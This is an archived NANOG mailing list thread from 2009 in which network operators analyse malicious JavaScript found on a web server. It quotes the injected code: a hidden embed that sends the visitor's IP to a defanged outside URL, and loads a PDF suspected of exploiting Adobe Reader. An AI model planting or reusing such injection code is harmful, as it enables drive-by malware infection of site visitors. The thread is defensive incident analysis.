nanog mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Malicious code just found on web server

From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:34:54 -0400
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster () gmail com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster () gmail com>
wrote:



On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate () gmail com>
wrote:


I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0"
style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.



Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.



Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- - ferg

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
/K0hKsJiAz4RGu8VQkyP+js=
=AzJq
-----END PGP SIGNATURE-----



--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
Previous By Date Next
Previous By Thread Next

Current thread: